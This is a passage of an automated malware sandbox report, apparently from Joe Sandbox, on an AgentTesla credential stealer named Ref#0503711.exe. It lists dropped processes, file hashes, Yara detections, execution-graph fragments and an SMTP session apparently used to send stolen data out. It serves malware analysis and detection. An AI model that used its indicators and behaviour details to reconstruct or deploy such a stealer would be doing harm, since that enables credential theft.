                                                              Oct 7, 2024 18:05:56.019640923 CEST49733587192.168.2.4162.254.34.31.
                                                              Oct 7, 2024 18:05:56.290463924 CEST58749733162.254.34.31192.168.2.4250 2.0.0 Ok: queued as C0E506C597
                                                              Oct 7, 2024 18:07:33.332895994 CEST49733587192.168.2.4162.254.34.31QUIT
                                                              Oct 7, 2024 18:07:33.489494085 CEST58749733162.254.34.31192.168.2.4221 2.0.0 Bye

                                                              Target ID:0
                                                              Start time:12:05:48
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\Desktop\Ref#0503711.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Ref#0503711.exe"
                                                              Imagebase:0xf50000
                                                              File size:1'907'648 bytes
                                                              MD5 hash:3B2E54913C8B29CE886C8B36F8DD0CFC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:12:05:49
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\docdd.exe"
                                                              Imagebase:0x470000
                                                              File size:46'592 bytes
                                                              MD5 hash:DBD0E17845DA07384D942B76268CF5B7
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:12:05:49
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\Desktop\Ref#0503711.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Ref#0503711.exe"
                                                              Imagebase:0x9a0000
                                                              File size:1'907'648 bytes
                                                              MD5 hash:3B2E54913C8B29CE886C8B36F8DD0CFC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2919838157.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:3
                                                              Start time:12:05:54
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                                                              Imagebase:0x780000
                                                              File size:2'474'944 bytes
                                                              MD5 hash:1590A3EFB4A143305E7182FBD284A414
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1795600087.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:12:05:55
                                                              Start date:07/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe"
                                                              Imagebase:0xd30000
                                                              File size:2'474'944 bytes
                                                              MD5 hash:1590A3EFB4A143305E7182FBD284A414
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:12:05:57
                                                              Start date:07/10/2024
                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996
                                                              Imagebase:0x9e0000
                                                              File size:483'680 bytes
                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                                Execution Graph

                                                                Execution Coverage:13%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:2.2%
                                                                Total number of Nodes:400
                                                                Total number of Limit Nodes:43
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-312445597
                                                                • Opcode ID: 514441f93f7dc23a52ee001db7e07a24f5650e895d1345e9b0d25c5426cef88b
                                                                • Instruction ID: 4aea2ae2279d91a5cbd4eff574058f1db1efa87cdfaa1cb2ada58e709fb16fd9
                                                                • Opcode Fuzzy Hash: 514441f93f7dc23a52ee001db7e07a24f5650e895d1345e9b0d25c5426cef88b
                                                                • Instruction Fuzzy Hash: 3CB20A34A402289FDB58CFA4C894BADBBF6FB48700F248599E505AB3A5CB71ED45CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2546334966
                                                                • Opcode ID: 7d4adb038268f1be6c3b96cd0324f2cf8484f846f198e851e3e2b34a8822c087
                                                                • Instruction ID: a3ec786defd12ca36d4a25dc9643f0c8b7cabc8502400dec969f6788f40dbc63
                                                                • Opcode Fuzzy Hash: 7d4adb038268f1be6c3b96cd0324f2cf8484f846f198e851e3e2b34a8822c087
                                                                • Instruction Fuzzy Hash: 7C22F934A40228CFDBA8CF64C994BADBBB6FF48300F149099D509AB3A5DB719D85CF50

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJcq$Te^q$pbq$xbaq
                                                                • API String ID: 0-1954897716
                                                                • Opcode ID: 90b6fcbd5af3ec3bb611a31905f5fec76c0c7c8d5430416adbac5fdb0b804b2b
                                                                • Instruction ID: 391a636a09098f5019a15989e0bd221edad07eab3a9ffa5194c685c26ee1bc4e
                                                                • Opcode Fuzzy Hash: 90b6fcbd5af3ec3bb611a31905f5fec76c0c7c8d5430416adbac5fdb0b804b2b
                                                                • Instruction Fuzzy Hash: 3EA2B375A00228CFDB65CF69C984A99BBB2FF89314F1581E9D50DAB325DB319E81CF40

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: f33187fba3b81d62227c039d0a16d6095221e4d661a222f46fb164ea2bec20ec
                                                                • Instruction ID: 2d76f41f9743311c09938672829295e53128b5ff1c587d195e7f6abb3a1f75a0
                                                                • Opcode Fuzzy Hash: f33187fba3b81d62227c039d0a16d6095221e4d661a222f46fb164ea2bec20ec
                                                                • Instruction Fuzzy Hash: 2B327D75E012298FEB24CF79D884AADB7F2BF88305F15C569E40AAB354DB349941CF90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$8
                                                                • API String ID: 0-89531850
                                                                • Opcode ID: bdb31790c262cda3a74fbeadfe2fa8a0e1484675ff06030b61f93c14fb7e368a
                                                                • Instruction ID: 4bb14df642ea7c29f0b1b4ea590ff38fdd6909389d979491663b80fbc0de01d4
                                                                • Opcode Fuzzy Hash: bdb31790c262cda3a74fbeadfe2fa8a0e1484675ff06030b61f93c14fb7e368a
                                                                • Instruction Fuzzy Hash: F942A575D006298BDB64DF69C850ADDB7B2BF89310F1486EAD40DA7251EB30AE85CF90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: df643be356e95528360c8edcf53033e4604593f669d4e34cd9f01b262b315781
                                                                • Instruction ID: e6b9cdaedeabe100a936c8297e1a6cbc4a11f9294e19e3b1342d9c7f028d52d4
                                                                • Opcode Fuzzy Hash: df643be356e95528360c8edcf53033e4604593f669d4e34cd9f01b262b315781
                                                                • Instruction Fuzzy Hash: 31E17E75E012298FEB24CF7ADC85AADB7F2BFC8305F058569D409AB354DB349942CB90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 994aa304405134f644bf66529fc6815b8fc04d5835545a149028d0c7ccbac077
                                                                • Instruction ID: b0176ce8ab214249b3769c5a08eb2fd6f431dfea2ba2bdb10bbfafa8423cb6ab
                                                                • Opcode Fuzzy Hash: 994aa304405134f644bf66529fc6815b8fc04d5835545a149028d0c7ccbac077
                                                                • Instruction Fuzzy Hash: 53E17D35E012298FEB24CF79DC85AADB7F2BFC8305F158669D409AB354DB349942CB90

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: e146c1652426e482c51180c653643b4d1dbb5c34b6618f87fd1cb0076e5b4372
                                                                • Instruction ID: fcb78183c5307893b0bd9a950d025c27bdd14057b08c962c265689abc3333108
                                                                • Opcode Fuzzy Hash: e146c1652426e482c51180c653643b4d1dbb5c34b6618f87fd1cb0076e5b4372
                                                                • Instruction Fuzzy Hash: 7CD16D35A016298FDB14CF7ADC85AAEB7F2BFC8305F158569D409EB354DB349902CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: ed2b6e1d67b1ca28156ce2b836d5c6a553d911b304b7b74cfaea74cae1736f6a
                                                                • Instruction ID: 2740f377a8db1c40883cb01b36fa652b055ed3d4fec25c1991095906eadb8989
                                                                • Opcode Fuzzy Hash: ed2b6e1d67b1ca28156ce2b836d5c6a553d911b304b7b74cfaea74cae1736f6a
                                                                • Instruction Fuzzy Hash: D5710574E512199FEB08DF6AED8069ABBF3FBC8304F14D529D0089B368EB345846CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q
                                                                • API String ID: 0-2697143702
                                                                • Opcode ID: 375ec2a8b841c39ae773a16b1cf6a4285b7668ca14c5b747768d5ef0a61df254
                                                                • Instruction ID: d6076dd70563125e9a1df98f7744d4be7fc1c2be1e5513b596e0a7d5725a6827
                                                                • Opcode Fuzzy Hash: 375ec2a8b841c39ae773a16b1cf6a4285b7668ca14c5b747768d5ef0a61df254
                                                                • Instruction Fuzzy Hash: F571F474E512199FEB08DF6AED8069ABBF3FBC8304F14D529D0089B368EB345846CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$h
                                                                • API String ID: 0-1849521214
                                                                • Opcode ID: bde546658d36de7ac39c45cc810023855ae7f20544e00d090c78683c3d155cad
                                                                • Instruction ID: ba4335a5c497ff0cbbbc50af5ff3203e537e7e2c90475ccc35a9399affaccbd8
                                                                • Opcode Fuzzy Hash: bde546658d36de7ac39c45cc810023855ae7f20544e00d090c78683c3d155cad
                                                                • Instruction Fuzzy Hash: 0761C671D016298BEB64CFAACC50BD9BBB2BF89300F14C2AAD40DA7254DB305A85CF51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2
                                                                • API String ID: 0-450215437
                                                                • Opcode ID: f7d74f6975e8e95624547cf17509af5edac4cdfdc784027344381812fa00df21
                                                                • Instruction ID: 197b6aab0beedfe90e5cdffd3b27d420c2b0abddf7116aa2ba043dec57797fff
                                                                • Opcode Fuzzy Hash: f7d74f6975e8e95624547cf17509af5edac4cdfdc784027344381812fa00df21
                                                                • Instruction Fuzzy Hash: B4C2AFB4E012298FDB65DF68C984A9DBBB6BF88300F1081E9D50DAB355DB309E85CF45
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060E0C7D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: d5b2e915e591a0c0ae56afd11c583be70e1d485d04ca7f98a1db2391a9844763
                                                                • Instruction ID: ad3c6059ad24c15ec1874396aa33ae02694c4a29a3b76cbcab361463de6492b1
                                                                • Opcode Fuzzy Hash: d5b2e915e591a0c0ae56afd11c583be70e1d485d04ca7f98a1db2391a9844763
                                                                • Instruction Fuzzy Hash: 2741A9B8D00258DFCF10CFA9D980ADEFBB5BB49310F10942AE819B7250C775A945CF69
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 060E0C7D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: 7164eae02aab372d495a2d6186a6aac3969840d2a2645ce78f3003bfca4e0ab0
                                                                • Instruction ID: 648e144a1dad3a08be5a15605d35a717f0d295d35bc4a183b5dc59fbb1f0a846
                                                                • Opcode Fuzzy Hash: 7164eae02aab372d495a2d6186a6aac3969840d2a2645ce78f3003bfca4e0ab0
                                                                • Instruction Fuzzy Hash: 0D4177B9D002589FCF10CFAAD984ADEFBB1BB49310F10942AE819B7210D775A945CF69
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: 1e7c4485bcdb5f28764bad6a89b6531adb1ed8a3188a36090f94e6b378201650
                                                                • Instruction ID: f2bd33cfba17ac6c1e2f87fc682910a64001049bfeabb94d620ad35346a22f18
                                                                • Opcode Fuzzy Hash: 1e7c4485bcdb5f28764bad6a89b6531adb1ed8a3188a36090f94e6b378201650
                                                                • Instruction Fuzzy Hash: 39E15971E002298FEB15CFA9C991BADBBF2BF84301F19C1A9D458AB255D734AD81CF50
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 060E21D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: e7c5ec31d81b5f9ae39b9461ca29df80f739e5edf7f0ed1fc0833ffedac2a946
                                                                • Instruction ID: 2abb545c4f2dac9716712eae843a5f68ae88dbbc0c0867231d75a87373fcc0b4
                                                                • Opcode Fuzzy Hash: e7c5ec31d81b5f9ae39b9461ca29df80f739e5edf7f0ed1fc0833ffedac2a946
                                                                • Instruction Fuzzy Hash: E631BBB5D012589FCB10CFA9D980ADEFBF1FB49310F10942AE859B7210C735AA45CF94
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 060E21D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 34555ce371b095eb8f3815c320bba8d9d05c4dfb03c2749bb193d54215ade373
                                                                • Instruction ID: 69b6d7d82c82012dbb2a77a2375fb1b3b8f58be51467ce24ba1c3c49ded2f16b
                                                                • Opcode Fuzzy Hash: 34555ce371b095eb8f3815c320bba8d9d05c4dfb03c2749bb193d54215ade373
                                                                • Instruction Fuzzy Hash: 8031A8B5D012589FCB10CFA9D984ADEFBF5BB49310F20942AE818B7210C775AA45CF94
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: a7ff084cb7e3be3ec80d7c7266da84ac5b28d86ee12e65821e2087a573e7c4be
                                                                • Instruction ID: b7a1cb18b234c7dba807092cab0f9da9df3756fa7f2e0368d42f67200a6579e3
                                                                • Opcode Fuzzy Hash: a7ff084cb7e3be3ec80d7c7266da84ac5b28d86ee12e65821e2087a573e7c4be
                                                                • Instruction Fuzzy Hash: 84D1D674E95318CFEB94CFA9D484BADBBF2BB89345F2080AAD409A7251D7745D84CF40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: c9bc64171ef42f8afb596dd48dcc085740bbcfe2c1c85e364fef5d0dea1e89f8
                                                                • Instruction ID: 51bb702ea1fcf64c8df0797ad853a116faeeae62a5593d6984610c36f418dce4
                                                                • Opcode Fuzzy Hash: c9bc64171ef42f8afb596dd48dcc085740bbcfe2c1c85e364fef5d0dea1e89f8
                                                                • Instruction Fuzzy Hash: 27D1E574E95218CFEBA4CFA9D884B9DBBF2FB89345F2080AAD409A7251D7745D84CF40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q
                                                                • API String ID: 0-671973202
                                                                • Opcode ID: e81be1dc6218acd6f7e409967571006ae8dcf3da061a010b5572c5074c32735b
                                                                • Instruction ID: 397baecc8c4667844ef89a0e7f69209ce0d4ef4cc99a657525083af597177f08
                                                                • Opcode Fuzzy Hash: e81be1dc6218acd6f7e409967571006ae8dcf3da061a010b5572c5074c32735b
                                                                • Instruction Fuzzy Hash: E5C1D274E41208CFEBA4CFA9C894BDEBBF2AB89304F14D0AAD449A7255D7345D85CF44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q
                                                                • API String ID: 0-671973202
                                                                • Opcode ID: 4a5920fbb64fdb0024cb7e98063bb2fd290cd068e655c196c118abf51bcb49fd
                                                                • Instruction ID: 48cfd19a71a9b241f71202fa702a2f1b41dcd8d0d2b1dfb44487c6474093c682
                                                                • Opcode Fuzzy Hash: 4a5920fbb64fdb0024cb7e98063bb2fd290cd068e655c196c118abf51bcb49fd
                                                                • Instruction Fuzzy Hash: AAB1A174E41218CFEB94CFA9C894BDEBBF2AB89304F10E0AAD40AA7255D7745D85CF44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: f6ababcca40d7d884429e45daa9570e710d80698cdb2e24ccf61a49cf4eefefb
                                                                • Instruction ID: 9ce5052274328f77216c93e0488f6f6c06f25959d04ec6da6f84d1aabf1c37c5
                                                                • Opcode Fuzzy Hash: f6ababcca40d7d884429e45daa9570e710d80698cdb2e24ccf61a49cf4eefefb
                                                                • Instruction Fuzzy Hash: BFB1F474E95219CFEBA4CFA8D488B9DBBF1FB49345F2080AAD409A7261D7749D84CF40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 00fd104556ec4ee859f07f0474f43496488704cfdd0f0aa059744dba7771da9b
                                                                • Instruction ID: 2bd5529b2894992e95393bfb978a52a6118ec88d51cbcb797ce76643158d89e2
                                                                • Opcode Fuzzy Hash: 00fd104556ec4ee859f07f0474f43496488704cfdd0f0aa059744dba7771da9b
                                                                • Instruction Fuzzy Hash: CD812A78E4020E9FDF14CFA9D9809AEBBB1FF88301F14A659D416EB294DB31A941CF50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e5b5b5ad1d4cdc176aef7e8ed2dbde14c188e008bac2232290700d4676bfbfd8
                                                                • Instruction ID: 92bc78c494a37953ea0328026e697e1e328680dc225f7155e81cf671fed21a07
                                                                • Opcode Fuzzy Hash: e5b5b5ad1d4cdc176aef7e8ed2dbde14c188e008bac2232290700d4676bfbfd8
                                                                • Instruction Fuzzy Hash: 1E32C374A0422ACFCB65DF28C984A99BBB6FF48300F1085E9E54DA7355DB30AE81CF54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fa3dbed6dc5e095a2f27256519c04d9c928782f1e83e1670708001ee9183f11
                                                                • Instruction ID: 43fcc1a0e8dbaf9a1ec9a217cc7ec0d8f34a054d0c55387dcd86f77aa69ccff8
                                                                • Opcode Fuzzy Hash: 4fa3dbed6dc5e095a2f27256519c04d9c928782f1e83e1670708001ee9183f11
